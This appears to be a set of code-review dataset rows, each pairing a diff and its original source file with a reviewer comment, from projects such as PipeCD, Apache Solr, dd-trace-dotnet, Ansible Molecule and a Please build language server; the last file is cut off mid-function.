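	router.Handle("/bzz-tag/name/{name}", jsonhttp.MethodHandler{
		"POST": http.HandlerFunc(s.createTag),
	})
```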
@@ -24,6 +24,6 @@ func (e *Executor) ensureTrafficSplit(ctx context.Context) model.StageStatus {
return model.StageStatus_STAGE_SUCCESS
}
-func (e *Executor) rollbackTraffic(ctx context.Context) model.StageStatus {
- return model.StageStatus_STAGE_SUCCESS
+func (e *Executor) rollbackTraffic(ctx context.Context) error {
+ return nil
} | 1 | // Copyright 2020 The PipeCD Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package kubernetes
import (
"context"
"github.com/pipe-cd/pipe/pkg/model"
)
func (e *Executor) ensureTrafficSplit(ctx context.Context) model.StageStatus {
return model.StageStatus_STAGE_SUCCESS
}
func (e *Executor) rollbackTraffic(ctx context.Context) model.StageStatus {
return model.StageStatus_STAGE_SUCCESS
}
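
As a hedged illustration (hypothetical code, not the PipeCD implementation): if the ctx parameter is kept on rollbackTraffic, the usual reason is to let a cancelled or timed-out deployment abandon the rollback work; otherwise the parameter could be dropped or blanked with _.

package main

import (
	"context"
	"fmt"
	"time"
)

// rollbackTraffic is a hypothetical stand-in that honours cancellation.
func rollbackTraffic(ctx context.Context) error {
	select {
	case <-ctx.Done():
		return fmt.Errorf("rollback aborted: %w", ctx.Err())
	case <-time.After(100 * time.Millisecond): // placeholder for real rollback work
		return nil
	}
}

func main() {
	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Millisecond)
	defer cancel()
	if err := rollbackTraffic(ctx); err != nil {
		fmt.Println(err) // rollback aborted: context deadline exceeded
	}
}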
| 1 | 7,930 | `ctx` is unused in rollbackTraffic | pipe-cd-pipe | go |
@@ -0,0 +1,12 @@
+
+using System;
+
+namespace SarifViewer
+{
+ internal sealed partial class Guids
+ {
+ public const string guidVSPackageString = "b97edb99-282e-444c-8f53-7de237f2ec5e";
+
+ public static Guid guidVSPackage = new Guid(guidVSPackageString);
+ }
+} | 1 | 1 | 10,010 | Roslyn conventions have const in PascalCase. | microsoft-sarif-sdk | .cs |
|
@@ -112,7 +112,7 @@ public class ZookeeperStatusHandler extends RequestHandlerBase {
.map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
.sorted().collect(Collectors.toList());
List<String> dynamicHosts = zkDynamicConfig.getServers().stream()
- .map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
+ .map(h -> h.resolveClientPortAddress() + ":" + (h.clientPort != null ? h.clientPort : "2181"))
.sorted().collect(Collectors.toList());
if (!connStringHosts.containsAll(dynamicHosts)) {
errors.add("Your ZK connection string (" + connStringHosts.size() + " hosts) is different from the " + | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.handler.admin;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.io.Writer;
import java.lang.invoke.MethodHandles;
import java.net.Socket;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.stream.Collectors;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.cloud.SolrZkClient;
import org.apache.solr.common.cloud.ZkDynamicConfig;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.core.CoreContainer;
import org.apache.solr.handler.RequestHandlerBase;
import org.apache.solr.request.SolrQueryRequest;
import org.apache.solr.response.SolrQueryResponse;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* Zookeeper Status handler, talks to ZK using sockets and four-letter words
*
* @since solr 7.5
*/
public class ZookeeperStatusHandler extends RequestHandlerBase {
private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass());
private static final int ZOOKEEPER_DEFAULT_PORT = 2181;
private static final String STATUS_RED = "red";
private static final String STATUS_GREEN = "green";
private static final String STATUS_YELLOW = "yellow";
private static final String STATUS_NA = "N/A";
private CoreContainer cores;
public ZookeeperStatusHandler(CoreContainer cc) {
this.cores = cc;
}
@Override
public String getDescription() {
return "Fetch Zookeeper status";
}
@Override
public Category getCategory() {
return Category.ADMIN;
}
@Override
@SuppressWarnings({"unchecked", "rawtypes"})
public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp) throws Exception {
NamedList values = rsp.getValues();
if (cores.isZooKeeperAware()) {
String zkHost = cores.getZkController().getZkServerAddress();
SolrZkClient zkClient = cores.getZkController().getZkClient();
final ZkDynamicConfig dynConfig = ZkDynamicConfig.parseLines(zkClient.getConfig());
values.add("zkStatus", getZkStatus(zkHost, dynConfig));
} else {
throw new SolrException(SolrException.ErrorCode.BAD_REQUEST, "The Zookeeper status API is only available in Cloud mode");
}
}
/**
* For each zk host, resolved either from zk connection string or from zk dynamic reconfiguration config,
   * fetches all config and status info from the ZK API and returns it as a map, where the key is the hostname
* @param zkHost zookeeper connection string
* @param zkDynamicConfig list of zk dynamic config objects
* @return map of zookeeper config and status per zk host
*/
@SuppressWarnings({"unchecked"})
protected Map<String, Object> getZkStatus(String zkHost, ZkDynamicConfig zkDynamicConfig) {
final ZkDynamicConfig hostsFromConnectionString = ZkDynamicConfig.fromZkConnectString(zkHost);
final ZkDynamicConfig zookeepers;
boolean dynamicReconfig;
final List<String> errors = new ArrayList<>();
String status = STATUS_NA;
if (zkDynamicConfig.size() == 0) {
// Fallback to parsing zkHost for older zk servers without support for dynamic reconfiguration
dynamicReconfig = false;
zookeepers = hostsFromConnectionString;
} else {
dynamicReconfig = true;
List<String> connStringHosts = hostsFromConnectionString.getServers().stream()
.map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
.sorted().collect(Collectors.toList());
List<String> dynamicHosts = zkDynamicConfig.getServers().stream()
.map(h -> h.resolveClientPortAddress() + ":" + h.clientPort)
.sorted().collect(Collectors.toList());
if (!connStringHosts.containsAll(dynamicHosts)) {
errors.add("Your ZK connection string (" + connStringHosts.size() + " hosts) is different from the " +
"dynamic ensemble config (" + dynamicHosts.size() + " hosts). Solr does not currently support " +
"dynamic reconfiguration and will only be able to connect to the zk hosts in your connection string.");
status = STATUS_YELLOW;
}
zookeepers = zkDynamicConfig; // Clone input
}
final Map<String, Object> zkStatus = new HashMap<>();
final List<Object> details = new ArrayList<>();
int numOk = 0;
int standalone = 0;
int followers = 0;
int reportedFollowers = 0;
int leaders = 0;
zkStatus.put("ensembleSize", zookeepers.size());
zkStatus.put("zkHost", zkHost);
for (ZkDynamicConfig.Server zk : zookeepers.getServers()) {
final String zkClientHostPort = zk.resolveClientPortAddress() + ":" + zk.clientPort;
try {
Map<String, Object> stat = monitorZookeeper(zkClientHostPort);
if (stat.containsKey("errors")) {
errors.addAll((List<String>)stat.get("errors"));
stat.remove("errors");
}
details.add(stat);
if ("true".equals(String.valueOf(stat.get("ok")))) {
numOk++;
}
String state = String.valueOf(stat.get("zk_server_state"));
if ("follower".equals(state) || "observer".equals(state)) {
followers++;
} else if ("leader".equals(state)) {
leaders++;
reportedFollowers = Math.max(
Integer.parseInt((String) stat.getOrDefault("zk_followers", "0")),
Integer.parseInt((String) stat.getOrDefault("zk_synced_followers", "0"))
);
} else if ("standalone".equals(state)) {
standalone++;
}
if (zk.role != null) {
stat.put("role", zk.role);
}
} catch (SolrException se) {
log.warn("Failed talking to zookeeper {}", zkClientHostPort, se);
errors.add(se.getMessage());
Map<String, Object> stat = new HashMap<>();
stat.put("host", zkClientHostPort);
stat.put("ok", false);
status = STATUS_YELLOW;
details.add(stat);
}
}
zkStatus.put("details", details);
zkStatus.put("dynamicReconfig", dynamicReconfig);
if (followers+leaders > 0 && standalone > 0) {
status = STATUS_RED;
errors.add("The zk nodes do not agree on their mode, check details");
}
if (standalone > 1) {
status = STATUS_RED;
errors.add("Only one zk allowed in standalone mode");
}
if (leaders > 1) {
zkStatus.put("mode", "ensemble");
status = STATUS_RED;
errors.add("Only one leader allowed, got " + leaders);
}
if (followers > 0 && leaders == 0) {
zkStatus.put("mode", "ensemble");
status = STATUS_RED;
errors.add("We do not have a leader");
}
if (leaders > 0 && followers != reportedFollowers) {
zkStatus.put("mode", "ensemble");
status = STATUS_RED;
errors.add("Leader reports " + reportedFollowers + " followers, but we only found " + followers +
". Please check zkHost configuration");
}
if (followers+leaders == 0 && standalone == 1) {
zkStatus.put("mode", "standalone");
}
if (followers+leaders > 0 && (zookeepers.size())%2 == 0) {
if (!STATUS_RED.equals(status)) {
status = STATUS_YELLOW;
}
errors.add("We have an even number of zookeepers which is not recommended");
}
if (followers+leaders > 0 && standalone == 0) {
zkStatus.put("mode", "ensemble");
}
if (status.equals(STATUS_NA)) {
if (numOk == zookeepers.size()) {
status = STATUS_GREEN;
} else if (numOk < zookeepers.size() && numOk > zookeepers.size() / 2) {
status = STATUS_YELLOW;
errors.add("Some zookeepers are down: " + numOk + "/" + zookeepers.size());
} else {
status = STATUS_RED;
errors.add("Mismatch in number of zookeeper nodes live. numOK=" + numOk + ", expected " + zookeepers.size());
}
}
zkStatus.put("status", status);
if (!errors.isEmpty()) {
zkStatus.put("errors", errors);
}
return zkStatus;
}
protected Map<String, Object> monitorZookeeper(String zkHostPort) throws SolrException {
Map<String, Object> obj = new HashMap<>();
List<String> errors = new ArrayList<>();
obj.put("host", zkHostPort);
List<String> lines = getZkRawResponse(zkHostPort, "ruok");
validateZkRawResponse(lines, zkHostPort, "ruok");
boolean ok = "imok".equals(lines.get(0));
obj.put("ok", ok);
lines = getZkRawResponse(zkHostPort, "mntr");
validateZkRawResponse(lines, zkHostPort, "mntr");
for (String line : lines) {
String[] parts = line.split("\t");
if (parts.length >= 2) {
obj.put(parts[0], parts[1]);
} else {
String err = String.format(Locale.ENGLISH, "Unexpected line in 'mntr' response from Zookeeper %s: %s", zkHostPort, line);
log.warn(err);
errors.add(err);
}
}
lines = getZkRawResponse(zkHostPort, "conf");
validateZkRawResponse(lines, zkHostPort, "conf");
for (String line : lines) {
String[] parts = line.split("=");
if (parts.length >= 2) {
obj.put(parts[0], parts[1]);
} else if (!line.startsWith("membership:")) {
String err = String.format(Locale.ENGLISH, "Unexpected line in 'conf' response from Zookeeper %s: %s", zkHostPort, line);
log.warn(err);
errors.add(err);
}
}
obj.put("errors", errors);
return obj;
}
/**
* Sends a four-letter-word command to one particular Zookeeper server and returns the response as list of strings
* @param zkHostPort the host:port for one zookeeper server to access
* @param fourLetterWordCommand the custom 4-letter command to send to Zookeeper
* @return a list of lines returned from Zookeeper
*/
protected List<String> getZkRawResponse(String zkHostPort, String fourLetterWordCommand) {
String[] hostPort = zkHostPort.split(":");
String host = hostPort[0];
int port = ZOOKEEPER_DEFAULT_PORT;
if (hostPort.length > 1) {
port = Integer.parseInt(hostPort[1]);
}
try (
Socket socket = new Socket(host, port);
Writer writer = new OutputStreamWriter(socket.getOutputStream(), StandardCharsets.UTF_8);
PrintWriter out = new PrintWriter(writer, true);
BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream(), StandardCharsets.UTF_8))) {
out.println(fourLetterWordCommand);
List<String> response = in.lines().collect(Collectors.toList());
log.debug("Got response from ZK on host {} and port {}: {}", host, port, response);
return response;
} catch (IOException e) {
throw new SolrException(SolrException.ErrorCode.SERVER_ERROR, "Failed talking to Zookeeper " + zkHostPort, e);
}
}
/**
* Takes the raw response lines returned by {@link #getZkRawResponse(String, String)} and runs some validations
* @param response the lines
* @param zkHostPort the host
* @param fourLetterWordCommand the 4lw command
* @return true if validation succeeds
* @throws SolrException if validation fails
*/
protected boolean validateZkRawResponse(List<String> response, String zkHostPort, String fourLetterWordCommand) {
if (response == null || response.isEmpty() || (response.size() == 1 && response.get(0).isBlank())) {
throw new SolrException(SolrException.ErrorCode.SERVER_ERROR, "Empty response from Zookeeper " + zkHostPort);
}
if (response.size() == 1 && response.get(0).contains("not in the whitelist")) {
throw new SolrException(SolrException.ErrorCode.SERVER_ERROR, "Could not execute " + fourLetterWordCommand +
" towards ZK host " + zkHostPort + ". Add this line to the 'zoo.cfg' " +
"configuration file on each zookeeper node: '4lw.commands.whitelist=mntr,conf,ruok'. See also chapter " +
"'Setting Up an External ZooKeeper Ensemble' in the Solr Reference Guide.");
}
return true;
}
}
| 1 | 35,900 | This is not bullet proof if e.g. user has `clientPort=1234` in `zoo.cfg` and in zkHost connection string. Then we'll add a warning that dynamic config differs from zkHost, which is not entirely true since we just lack the port part. We have no way from client to read the `clientPort` from server except from connecting to the server with 4LW *ont the clientPort* which is a chicken and egg. This hack will make the comparison work for default port, which is a compromise. | apache-lucene-solr | java |
@@ -1,8 +1,8 @@
#if MESSAGEPACK_2_1
using System;
using Datadog.Trace.ExtensionMethods;
-using MessagePack;
-using MessagePack.Formatters;
+using Datadog.Trace.Vendors.MessagePack;
+using Datadog.Trace.Vendors.MessagePack.Formatters;
namespace Datadog.Trace.Agent.MessagePack
{ | 1 | #if MESSAGEPACK_2_1
using System;
using Datadog.Trace.ExtensionMethods;
using MessagePack;
using MessagePack.Formatters;
namespace Datadog.Trace.Agent.MessagePack
{
internal class SpanMessagePackFormatter : IMessagePackFormatter<Span>
{
public void Serialize(ref MessagePackWriter writer, Span value, MessagePackSerializerOptions options)
{
// First, pack array length (or map length).
// It should be the number of members of the object to be serialized.
var len = 8;
if (value.Context.ParentId != null)
{
len++;
}
if (value.Error)
{
len++;
}
if (value.Tags != null)
{
len++;
}
if (value.Metrics != null)
{
len++;
}
writer.WriteMapHeader(len);
writer.Write("trace_id");
writer.Write(value.Context.TraceId);
writer.Write("span_id");
writer.Write(value.Context.SpanId);
writer.Write("name");
writer.Write(value.OperationName);
writer.Write("resource");
writer.Write(value.ResourceName);
writer.Write("service");
writer.Write(value.ServiceName);
writer.Write("type");
writer.Write(value.Type);
writer.Write("start");
writer.Write(value.StartTime.ToUnixTimeNanoseconds());
writer.Write("duration");
writer.Write(value.Duration.ToNanoseconds());
if (value.Context.ParentId != null)
{
writer.Write("parent_id");
writer.Write((ulong)value.Context.ParentId);
}
if (value.Error)
{
writer.Write("error");
writer.Write(1);
}
if (value.Tags != null)
{
writer.Write("meta");
writer.WriteMapHeader(value.Tags.Count);
foreach (var pair in value.Tags)
{
writer.Write(pair.Key);
writer.Write(pair.Value);
}
}
if (value.Metrics != null)
{
writer.Write("metrics");
writer.WriteMapHeader(value.Metrics.Count);
foreach (var pair in value.Metrics)
{
writer.Write(pair.Key);
writer.Write(pair.Value);
}
}
}
public Span Deserialize(ref MessagePackReader reader, MessagePackSerializerOptions options)
{
throw new NotImplementedException();
}
}
}
#endif
| 1 | 17,382 | We can probably delete this entire file. It's not used now and we'll (probably) write a custom serializer before we ever switch to MessagePack 2.1. | DataDog-dd-trace-dotnet | .cs |
@@ -174,8 +174,11 @@ class ConfigV1(Config):
'limit': 'all',
'playbook': 'playbook.yml',
'raw_ssh_args': [
- '-o UserKnownHostsFile=/dev/null', '-o IdentitiesOnly=yes',
- '-o ControlMaster=auto', '-o ControlPersist=60s'
+ '-o UserKnownHostsFile=/dev/null',
+ '-o IdentitiesOnly=yes',
+ '-o ControlMaster=auto',
+ '-o ControlPersist=60s',
+ '-o IdentitiesOnly=yes',
],
'tags': False,
'timeout': 30, | 1 | # Copyright (c) 2015-2016 Cisco Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import abc
import os
import os.path
import anyconfig
import m9dicts
from re import sub
from molecule import util
PROJECT_CONFIG = 'molecule.yml'
LOCAL_CONFIG = os.path.expanduser('~/.config/molecule/config.yml')
MERGE_STRATEGY = anyconfig.MS_DICTS
class Config(object):
__metaclass__ = abc.ABCMeta
def __init__(self, configs=[LOCAL_CONFIG, PROJECT_CONFIG]):
"""
Base initializer for all Config classes.
:param command_args: A list configs files to merge.
:returns: None
"""
self.config = self._get_config(configs)
@property
def molecule_file(self):
return PROJECT_CONFIG
@property
def molecule_local_config_file(self):
return LOCAL_CONFIG
@abc.abstractmethod
def _get_config(self, configs):
pass # pragma: no cover
class ConfigV1(Config):
def __init__(self, configs=[LOCAL_CONFIG, PROJECT_CONFIG]):
"""
Initialize a new config version one class and returns None.
"""
super(ConfigV1, self).__init__(configs)
self._build_config_paths()
def molecule_file_exists(self):
return os.path.isfile(self.molecule_file)
def molecule_local_config_file_exists(self):
return os.path.isfile(self.molecule_local_config_file)
def populate_instance_names(self, platform):
"""
Updates instances section of config with an additional key containing
the full instance name
:param platform: platform name to pass to ``format_instance_name`` call
:return: None
"""
if 'vagrant' in self.config:
for instance in self.config['vagrant']['instances']:
instance['vm_name'] = util.format_instance_name(
instance['name'], platform,
self.config['vagrant']['instances'])
def _get_config(self, configs):
return self._combine(configs)
def _combine(self, configs):
""" Perform a prioritized recursive merge of serveral source files
and returns a new dict.
The merge order is based on the index of the list, meaning that
elements at the end of the list will be merged last, and have greater
precedence than elements at the beginning. The result is then merged
ontop of the defaults.
:param configs: A list containing the yaml files to load.
:return: dict
"""
default = self._get_defaults()
conf = anyconfig.to_container(default, ac_merge=MERGE_STRATEGY)
conf.update(
anyconfig.load(
configs, ignore_missing=True, ac_merge=MERGE_STRATEGY))
return self._expand_env_vars(m9dicts.convert_to(conf))
def _expand_env_vars(self, config):
""" Recursively searches for occurences of ${} and expands
them to a corresponding environment variable or an empty
string.
:param config: An iterable containing the merged config
:return: dict
"""
def __get_env_var(matchobj):
return os.environ.get(matchobj.group(1), '')
def __replace_matches(line):
if not isinstance(line, basestring):
return line
return sub('\$\{([^\}]*)\}', __get_env_var, line)
def __recursive_string_replace(config):
if isinstance(config, dict):
# Replace dict keys
for i in list(config):
new_name = __replace_matches(i)
if i != new_name:
val = config[i]
del config[i]
config[new_name] = val
# Replace dict values
for k, v in config.iteritems():
if isinstance(v, (dict, list)):
__recursive_string_replace(v)
else:
config[k] = __replace_matches(v)
else:
# Replace list items
for i, v in enumerate(config):
if isinstance(v, (dict, list)):
__recursive_string_replace(v)
else:
config[i] = __replace_matches(v)
__recursive_string_replace(config)
return config
def _get_defaults(self):
return {
'ansible': {
'ask_become_pass': False,
'ask_vault_pass': False,
'become': True,
'become_user': False,
'config_file': 'ansible.cfg',
'ansiblecfg_defaults': {
'retry_files_enabled': False,
},
'ansiblecfg_ssh_connection': {},
'diff': True,
'host_key_checking': False,
'inventory_file': 'ansible_inventory',
'limit': 'all',
'playbook': 'playbook.yml',
'raw_ssh_args': [
'-o UserKnownHostsFile=/dev/null', '-o IdentitiesOnly=yes',
'-o ControlMaster=auto', '-o ControlPersist=60s'
],
'tags': False,
'timeout': 30,
'vault_password_file': False,
'verbose': False
},
'molecule': {
'goss_dir': 'tests',
'goss_playbook': 'test_default.yml',
'ignore_paths': ['.git', '.vagrant', '.molecule'],
'init': {
'platform': {
'box': 'trusty64',
'box_url':
('https://vagrantcloud.com/ubuntu/boxes/trusty64/'
'versions/14.04/providers/virtualbox.box'),
'box_version': '0.1.0',
'name': 'trusty64'
},
'provider': {
'name': 'virtualbox',
'type': 'virtualbox'
}
},
'molecule_dir': '.molecule',
'rakefile_file': 'rakefile',
'raw_ssh_args': [
'-o StrictHostKeyChecking=no',
'-o UserKnownHostsFile=/dev/null'
],
'serverspec_dir': 'spec',
'state_file': 'state.yml',
'test': {
'sequence': [
'destroy', 'dependency', 'syntax', 'create',
'converge', 'idempotence', 'verify'
]
},
'testinfra_dir': 'tests',
'vagrantfile_file': 'vagrantfile',
},
'verifier': {
'name': 'testinfra',
'options': {}
},
'dependency': {
'name': 'galaxy',
'options': {}
},
'_disabled': [],
}
def _build_config_paths(self):
"""
Convenience function to build up paths from our config values. Path
will not be relative to ``molecule_dir``, when a full path was provided
in the config.
:return: None
"""
md = self.config.get('molecule')
ad = self.config.get('ansible')
for item in ['state_file', 'vagrantfile_file', 'rakefile_file']:
if md and not self._is_path(md[item]):
md[item] = os.path.join(md['molecule_dir'], md[item])
for item in ['config_file', 'inventory_file']:
if ad and not self._is_path(ad[item]):
ad[item] = os.path.join(md['molecule_dir'], ad[item])
def _is_path(self, pathname):
return os.path.sep in pathname
def merge_dicts(a, b):
"""
Merges the values of B into A and returns a new dict. Uses the same merge
strategy as ``config._combine``.
::
dict a
b:
- c: 0
- c: 2
d:
e: "aaa"
f: 3
dict b
a: 1
b:
- c: 3
d:
e: "bbb"
Will give an object such as::
{'a': 1, 'b': [{'c': 3}], 'd': {'e': "bbb", 'f': 3}}
:param a: the target dictionary
:param b: the dictionary to import
:return: dict
"""
conf = anyconfig.to_container(a, ac_merge=MERGE_STRATEGY)
conf.update(b)
return conf
| 1 | 6,939 | Aren't you duplicating this option? | ansible-community-molecule | py |
@@ -440,6 +440,17 @@ func (a *Analyzer) IsBuildFile(uri lsp.DocumentURI) bool {
return a.State.Config.IsABuildFile(base)
}
+// IsBuildDefFile takes a uri path and checks if it's a valid .build_defs file
+func (a *Analyzer) IsBuildDefFile(uri lsp.DocumentURI) bool {
+ filepath, err := GetPathFromURL(uri, "file")
+ if err != nil {
+ return false
+ }
+
+ base := path.Base(filepath)
+ return strings.HasSuffix(base, ".build_defs")
+}
+
// e.g. src type:list, required:false
func getArgString(argument asp.Argument) string {
argType := strings.Join(argument.Type, "|") | 1 | package langserver
import (
"context"
"core"
"fmt"
"io/ioutil"
"path"
"sort"
"strconv"
"strings"
"parse/asp"
"parse/rules"
"src/fs"
"tools/build_langserver/lsp"
)
// Analyzer is a wrapper around asp.parser
// This is being loaded into a handler on initialization
type Analyzer struct {
parser *asp.Parser
State *core.BuildState
BuiltIns map[string]*RuleDef
Attributes map[string][]*RuleDef
}
// RuleDef is a wrapper around asp.FuncDef,
// it also includes a Header(function definition)
// And Argument map stores the name and the information of the arguments this rule has
type RuleDef struct {
*asp.FuncDef
Header string
ArgMap map[string]*Argument
// This applies when the FuncDef is a attribute of an object
Object string
}
// Argument is a wrapper around asp.Argument,
// this is used to store the argument information for specific rules,
// and it also tells you if the argument is required
type Argument struct {
*asp.Argument
definition string
required bool
}
// Identifier is a wrapper around asp.Identifier
// Including the starting line and the ending line number
type Identifier struct {
*asp.IdentStatement
Type string
Pos lsp.Position
EndPos lsp.Position
}
// BuildDef is the definition for a build target.
// often a function call using a specific build rule
type BuildDef struct {
*Identifier
BuildDefName string
Visibility []string
// The content of the build definition
Content string
}
// Statement is a simplified version of asp.Statement
// Here we only care about Idents and Expressions
type Statement struct {
Ident *Identifier
Expression *asp.Expression
}
// BuildLabel is a wrapper around core.BuildLabel
// Including the path of the buildFile
type BuildLabel struct {
*core.BuildLabel
// Path of the build file
Path string
// IdentStatement for the build definition,
// usually the call to the specific buildrule, such as "go_library()"
BuildDef *BuildDef
// The content of the build definition
Definition string
}
func newAnalyzer() (*Analyzer, error) {
// Saving the state to Analyzer,
// so we will be able to get the CONFIG properties by calling state.config.GetTags()
config, err := core.ReadDefaultConfigFiles("")
if err != nil {
return nil, err
}
state := core.NewBuildState(1, nil, 4, config)
parser := asp.NewParser(state)
a := &Analyzer{
parser: parser,
State: state,
}
a.builtInsRules()
return a, nil
}
// BuiltInsRules gets all the builtin functions and rules as a map, and store it in Analyzer.BuiltIns
// This is typically called when instantiate a new Analyzer
func (a *Analyzer) builtInsRules() error {
statementMap := make(map[string]*RuleDef)
attrMap := make(map[string][]*RuleDef)
dir, _ := rules.AssetDir("")
sort.Strings(dir)
// Iterate through the directory and get the builtin statements
for _, filename := range dir {
if !strings.HasSuffix(filename, ".gob") {
asset := rules.MustAsset(filename)
stmts, err := a.parser.ParseData(asset, filename)
if err != nil {
log.Fatalf("%s", err)
}
// Iterate through the statement we got and add to statementMap
for _, statement := range stmts {
if statement.FuncDef != nil && !strings.HasPrefix(statement.FuncDef.Name, "_") {
content := string(asset)
ruleDef := newRuleDef(content, statement)
statementMap[statement.FuncDef.Name] = ruleDef
// Fill in attribute map if certain ruleDef is a attribute
if ruleDef.Object != "" {
if _, ok := attrMap[ruleDef.Object]; ok {
attrMap[ruleDef.Object] = append(attrMap[ruleDef.Object], ruleDef)
} else {
attrMap[ruleDef.Object] = []*RuleDef{ruleDef}
}
}
}
}
}
}
a.BuiltIns = statementMap
a.Attributes = attrMap
return nil
}
func newRuleDef(content string, stmt *asp.Statement) *RuleDef {
ruleDef := &RuleDef{
FuncDef: stmt.FuncDef,
ArgMap: make(map[string]*Argument),
}
// Fill in the header property of ruleDef
contentStrSlice := strings.Split(content, "\n")
headerSlice := contentStrSlice[stmt.Pos.Line-1 : stmt.FuncDef.EoDef.Line]
if len(stmt.FuncDef.Arguments) > 0 {
for i, arg := range stmt.FuncDef.Arguments {
// Check if it a builtin type method, and reconstruct header if it is
if i == 0 && arg.Name == "self" {
originalDef := fmt.Sprintf("def %s(self:%s", stmt.FuncDef.Name, arg.Type[0])
if len(stmt.FuncDef.Arguments) > 1 {
originalDef += ", "
}
newDef := fmt.Sprintf("%s.%s(", arg.Type[0], stmt.FuncDef.Name)
headerSlice[0] = strings.Replace(headerSlice[0], originalDef, newDef, 1)
ruleDef.Object = arg.Type[0]
} else {
// Fill in the ArgMap
argString := getArgString(arg)
ruleDef.ArgMap[arg.Name] = &Argument{
Argument: &arg,
definition: argString,
required: arg.Value == nil,
}
}
}
}
ruleDef.Header = strings.TrimSuffix(strings.Join(headerSlice, "\n"), ":")
return ruleDef
}
// AspStatementFromFile gets all the Asp.Statement from a given BUILD file
// *reads complete files only*
func (a *Analyzer) AspStatementFromFile(uri lsp.DocumentURI) ([]*asp.Statement, error) {
filepath, err := GetPathFromURL(uri, "file")
if err != nil {
return nil, err
}
bytecontent, err := ioutil.ReadFile(filepath)
if err != nil {
return nil, err
}
stmts, _ := a.parser.ParseData(bytecontent, filepath)
if err != nil {
log.Warning(fmt.Sprintf("parsing failure: %s ", err))
}
return stmts, nil
}
// StatementFromPos returns a Statement struct with either an Identifier or asp.Expression
func (a *Analyzer) StatementFromPos(uri lsp.DocumentURI, position lsp.Position) (*Statement, error) {
// Get all the statements from the build file
stmts, err := a.AspStatementFromFile(uri)
if err != nil {
return nil, err
}
statement, expr := asp.StatementOrExpressionFromAst(stmts,
asp.Position{Line: position.Line + 1, Column: position.Character + 1})
if statement != nil {
return &Statement{
Ident: a.identFromStatement(statement),
}, nil
} else if expr != nil {
return &Statement{
Expression: expr,
}, nil
}
return nil, nil
}
func (a *Analyzer) identFromStatement(stmt *asp.Statement) *Identifier {
// get the identifier type
var identType string
if stmt.Ident.Action != nil {
if stmt.Ident.Action.Property != nil {
identType = "property"
} else if stmt.Ident.Action.Call != nil {
identType = "call"
} else if stmt.Ident.Action.Assign != nil {
identType = "assign"
} else if stmt.Ident.Action.AugAssign != nil {
identType = "augAssign"
}
}
ident := &Identifier{
IdentStatement: stmt.Ident,
Type: identType,
// -1 from asp.Statement.Pos.Line, as lsp position requires zero index
Pos: lsp.Position{Line: stmt.Pos.Line - 1, Character: stmt.Pos.Column - 1},
EndPos: lsp.Position{Line: stmt.EndPos.Line - 1, Character: stmt.EndPos.Column - 1},
}
return ident
}
// BuildLabelFromString returns a BuildLabel object,
func (a *Analyzer) BuildLabelFromString(ctx context.Context,
currentURI lsp.DocumentURI, labelStr string) (*BuildLabel, error) {
filepath, err := GetPathFromURL(currentURI, "file")
if err != nil {
return nil, err
}
label, err := core.TryParseBuildLabel(labelStr, path.Dir(filepath))
if err != nil {
return nil, err
}
if label.IsEmpty() {
return nil, fmt.Errorf("empty build label %s", labelStr)
}
// Get the BUILD file path for the build label
// Handling subrepo
if label.Subrepo != "" {
return &BuildLabel{
BuildLabel: &label,
Path: label.PackageDir(),
BuildDef: nil,
Definition: "Subrepo label: " + labelStr,
}, nil
}
labelPath := string(a.BuildFileURIFromPackage(label.PackageDir()))
if !fs.PathExists(labelPath) {
return nil, fmt.Errorf("cannot find the path for build label %s", labelStr)
}
// Get the BuildDef and BuildDefContent for the BuildLabel
var buildDef *BuildDef
var definition string
if label.IsAllSubpackages() {
// Check for cases such as "//tools/build_langserver/..."
definition = "BuildLabel includes all subpackages in path: " + path.Join(path.Dir(labelPath))
} else if label.IsAllTargets() {
// Check for cases such as "//tools/build_langserver/all"
